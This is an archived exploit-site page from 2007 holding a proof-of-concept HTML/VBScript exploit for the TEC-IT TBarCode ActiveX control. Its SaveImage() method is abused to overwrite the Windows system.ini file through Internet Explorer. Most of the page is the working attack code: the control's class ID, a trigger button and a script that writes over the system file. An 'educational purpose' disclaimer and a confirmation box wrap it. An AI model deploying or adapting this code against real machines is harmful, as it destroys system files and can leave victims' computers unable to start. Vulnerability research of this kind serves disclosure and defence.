Home / exploitsPDF  

tecit-activex.txt

Posted on 13 June 2007

<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">----------------------------------------------------------------------------------------------------------------- <b>TEC-IT TBarCode OCX ActiveX Control (TBarCode7.ocx v. 7.0.2.3524) "SaveImage()" Remote Arbitrary File Overwrite</b> url: http://www.tec-it.com/asp/main/startfr.asp?LN=1 author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org This was written for educational purpose. Use it at your own risk. Author will be not be responsible for any damage. <b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b> Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 all software that use this ocx are vulnerable to this exploits. ----------------------------------------------------------------------------------------------------------------- <object classid='clsid:D8541765-F6D2-4EE1-AEAA-4016BE1D9859' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language='vbscript'> Sub tryMe On Error Resume Next Dim MyMsg If(MsgBox("This was written for educational purpose. Use it at your own risk." & vbCrLf & _ "Author will be not be responsible for any damage." & vbCrLf & vbCrLf & _ "THIS EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY" & _ " OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!" & VBcRlF & "ARE YOU" & _ " SURE YOU REALLY WANT TO RUN THIS EXPLOIT?",4)=vbYes) Then test.SaveImage "c:windowssystem_.ini", 1, 1, 1, 1, 1 MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"2007/05/21 - TEC-IT TBarCode") Else MyMsg = MsgBox ("Nice, be safe!", 64, "2007/05/21 - TEC-IT TBarCode") End If End Sub </script> </span></span> </code></pre>

 

TOP